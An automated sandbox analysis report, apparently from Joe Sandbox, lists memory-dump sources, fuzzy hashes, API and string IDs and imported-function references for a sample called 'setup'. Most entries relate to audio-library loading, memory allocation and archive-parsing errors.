                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoMonitor$Window
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3397208210-3887548279
                                                                                                    • Opcode ID: 9eea919aae5f268a086e0302b2ceab6cf53b55541129390eca9a487bf15d54ea
                                                                                                    • Instruction ID: ee62085cdb237353df3e9476fca8d08ccd180284aa7f2cb5950da9846bed81ca
                                                                                                    • Opcode Fuzzy Hash: 9eea919aae5f268a086e0302b2ceab6cf53b55541129390eca9a487bf15d54ea
                                                                                                    • Instruction Fuzzy Hash: AA1237B45183018FEB58EF28C58831ABBF1BF84315F16892DE8998B356E774D854CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exitlongjmp$_lseeki64_readfree
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$ERROR: can't read %lu bytes$ERROR: file read operation failed$ERROR: file seek operation failed
                                                                                                    • API String ID: 889463729-4100299135
                                                                                                    • Opcode ID: cea59968cdb1c070932f689e591cb980b739754b68fda250f17766d608abf092
                                                                                                    • Instruction ID: 7b7dc188845050ee120607462f60590cab50ee0a380253a77ed0d6b92902c3c3
                                                                                                    • Opcode Fuzzy Hash: cea59968cdb1c070932f689e591cb980b739754b68fda250f17766d608abf092
                                                                                                    • Instruction Fuzzy Hash: 2A6138B06287069FD721EF69D48531EBBE0BF89345F11882DE9889B352D7B4C8508B96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$_close_wremoveexitmemmove
                                                                                                    • String ID: %s$@q($@q($ERROR: can't alloc %lu memory bytes$ERROR: can't close file %s
                                                                                                    • API String ID: 2251729985-616239092
                                                                                                    • Opcode ID: a03d25775a07d053953e13523b90537785c1f3b8ba18739ba8553e546912cf04
                                                                                                    • Instruction ID: 07541e1641c380e711f22c358e91ed6bd7eaff13639142fdb2248bc2500945b7
                                                                                                    • Opcode Fuzzy Hash: a03d25775a07d053953e13523b90537785c1f3b8ba18739ba8553e546912cf04
                                                                                                    • Instruction Fuzzy Hash: 9D616DB85197119BD711BF69D58932EBBE0BF50300F45886DE9C88F386DB74D890CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exitfree$_close$longjmp$Char
                                                                                                    • String ID: %s$ERROR: can't close file %s
                                                                                                    • API String ID: 2887407855-2251370396
                                                                                                    • Opcode ID: 22afa84348717ff95b403ba89e7338b7ef5794bd41df5c79b022fc7371a66886
                                                                                                    • Instruction ID: e36e3729514ee5cd0f095f2c5b06f8db33c4ba4a29e947ffb53b20f57475b87f
                                                                                                    • Opcode Fuzzy Hash: 22afa84348717ff95b403ba89e7338b7ef5794bd41df5c79b022fc7371a66886
                                                                                                    • Instruction Fuzzy Hash: E8511DB05287129BD720BF65C58126EBBE4AF51740F06882DE9C89B302DBB4D8D0DF92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215731: EnterCriticalSection.KERNEL32(00357D30,0023BDFF,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00215736
                                                                                                    • LoadLibraryA.KERNEL32(mfreadwrite,77317130,00215066,00000000,77317130,?,?,00231BA6,?,FFE7FFFF), ref: 00214F81
                                                                                                    • LoadLibraryA.KERNEL32(mfplat,00000000,?,?,00231BA6,?,FFE7FFFF), ref: 00214F96
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFStartup), ref: 00214FAE
                                                                                                    • GetProcAddress.KERNEL32(MFCreateSourceReaderFromByteStream), ref: 00214FCC
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCreateAsyncResult), ref: 00214FD9
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFPutWorkItem), ref: 00214FE6
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFInvokeCallback), ref: 00214FF3
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCreateAttributes), ref: 00215000
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCreateMediaType), ref: 0021500D
                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCreateWaveFormatExFromMFMediaType), ref: 0021501A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$CriticalEnterSection
                                                                                                    • String ID: MFCreateAsyncResult$MFCreateAttributes$MFCreateMediaType$MFCreateSourceReaderFromByteStream$MFCreateWaveFormatExFromMFMediaType$MFInvokeCallback$MFPutWorkItem$MFStartup$mfplat$mfreadwrite
                                                                                                    • API String ID: 479578514-1323034271
                                                                                                    • Opcode ID: 83b1926933020ce3fee5216b024c84bbc0e26046d3e6c952541c9d2f57af7658
                                                                                                    • Instruction ID: c0c6d57402c8aac5d69edd1c037ada2f171be0c68a52e40fc27f5336ba40740b
                                                                                                    • Opcode Fuzzy Hash: 83b1926933020ce3fee5216b024c84bbc0e26046d3e6c952541c9d2f57af7658
                                                                                                    • Instruction Fuzzy Hash: 41114571A51726E6C7126B75BC059DB6EECABA9B51F00049BE410D21B0EBF494458B50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00214F63: LoadLibraryA.KERNEL32(mfreadwrite,77317130,00215066,00000000,77317130,?,?,00231BA6,?,FFE7FFFF), ref: 00214F81
                                                                                                      • Part of subcall function 00214F63: LoadLibraryA.KERNEL32(mfplat,00000000,?,?,00231BA6,?,FFE7FFFF), ref: 00214F96
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFStartup), ref: 00214FAE
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(MFCreateSourceReaderFromByteStream), ref: 00214FCC
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFCreateAsyncResult), ref: 00214FD9
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFPutWorkItem), ref: 00214FE6
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFInvokeCallback), ref: 00214FF3
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFCreateAttributes), ref: 00215000
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFCreateMediaType), ref: 0021500D
                                                                                                      • Part of subcall function 00214F63: GetProcAddress.KERNEL32(00000000,MFCreateWaveFormatExFromMFMediaType), ref: 0021501A
                                                                                                    • free.MSVCRT ref: 002150E8
                                                                                                    • Sleep.KERNEL32(00000014,00000001,?,00231BA6,?,FFE7FFFF), ref: 002151C7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00215323
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00215341
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,0000000C,00000000,00000000,?,?), ref: 0021538B
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,00000000,00000000), ref: 002153B3
                                                                                                    • sprintf.MSVCRT ref: 002153C5
                                                                                                    • PropVariantClear.OLE32(00000013), ref: 002153F4
                                                                                                    • PropVariantClear.OLE32(?,?,00231BA6,?,FFE7FFFF), ref: 00215411
                                                                                                    • EnterCriticalSection.KERNEL32(00000070,?,00231BA6,?,FFE7FFFF), ref: 00215469
                                                                                                    • LeaveCriticalSection.KERNEL32(00000070,?,00231BA6,?,FFE7FFFF), ref: 002154E1
                                                                                                    • sscanf.MSVCRT ref: 0021552D
                                                                                                    • __aulldiv.LIBCMT ref: 00215579
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharMultiWide$ClearCriticalLibraryLoadPropSectionVariant$EnterLeaveSleep__aulldivfreesprintfsscanf
                                                                                                    • String ID: %x %x %x %llx$Ha!$R[!$`d!$auds$iTunSMPB=
                                                                                                    • API String ID: 2978935900-1782756325
                                                                                                    • Opcode ID: 3978db87a739110e1d30609117806b5fe4e285a4eef81edcd00a411a976a9f4d
                                                                                                    • Instruction ID: e5310fd86d3a53468fc4b31fbaa00f3bdccf4f6acfe3068c02b3d4ff5552f276
                                                                                                    • Opcode Fuzzy Hash: 3978db87a739110e1d30609117806b5fe4e285a4eef81edcd00a411a976a9f4d
                                                                                                    • Instruction Fuzzy Hash: 000276B1118706EFC710EF64C884AABBBE9FF98354F10495DF596872A0C771E891CB62
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • ERROR: archive structure corrupted (bad string), xrefs: 002868D6
                                                                                                    • ERROR: archive structure corrupted (strange descriptor), xrefs: 00286836
                                                                                                    • ERROR: can't alloc %lu memory bytes, xrefs: 00286976
                                                                                                    • ERROR: archive structure corrupted (bad data), xrefs: 0028686C
                                                                                                    • ERROR: archive structure corrupted (descriptor failed CRC check), xrefs: 002866F2
                                                                                                    • %s, xrefs: 00286712, 0028688C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _filelengthi64malloc$exit
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad data)$ERROR: archive structure corrupted (bad string)$ERROR: archive structure corrupted (descriptor failed CRC check)$ERROR: archive structure corrupted (strange descriptor)$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2950442535-972693666
                                                                                                    • Opcode ID: a2df44172a10327d06524c6310b935a8ee1dc8027c8a947b7bc5d5bbabcf2143
                                                                                                    • Instruction ID: 79b6f527f4dab05f196f9623391cf24f4df8944b3388a1e83e6320f28860b3fa
                                                                                                    • Opcode Fuzzy Hash: a2df44172a10327d06524c6310b935a8ee1dc8027c8a947b7bc5d5bbabcf2143
                                                                                                    • Instruction Fuzzy Hash: 20A147B99152058FCB10EF69C58469EBBF1FF88320F15856AE888AB385D774DC50CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unicode$ByteCharMultiVirtualWide
                                                                                                    • String ID: `$a$b$c$d$e$f$g$h$i$j$k$m$n$o
                                                                                                    • API String ID: 4148918737-2028020120
                                                                                                    • Opcode ID: 362d80234034e24053759957121302d9e5a7800f7d59f63776295c4350fc5cee
                                                                                                    • Instruction ID: 0411d655fe9e25a8bc753a28641b19a0e4749399f711b37db6c8b3044c5c20a3
                                                                                                    • Opcode Fuzzy Hash: 362d80234034e24053759957121302d9e5a7800f7d59f63776295c4350fc5cee
                                                                                                    • Instruction Fuzzy Hash: 1B4107B04087418FE310DF29D59832BBFF5FB81718F508A1DE9954A291D3BA85698F93
                                                                                                    APIs
                                                                                                      • Part of subcall function 0025EB70: strlen.MSVCRT ref: 0025EBE7
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332938
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033293D
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332942
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332947
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033294C
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332951
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332956
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033295B
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332960
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332968
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033296D
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332972
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332977
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033297C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332981
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332986
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033298B
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332990
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332995
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033299C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 003329A1
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 003329A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
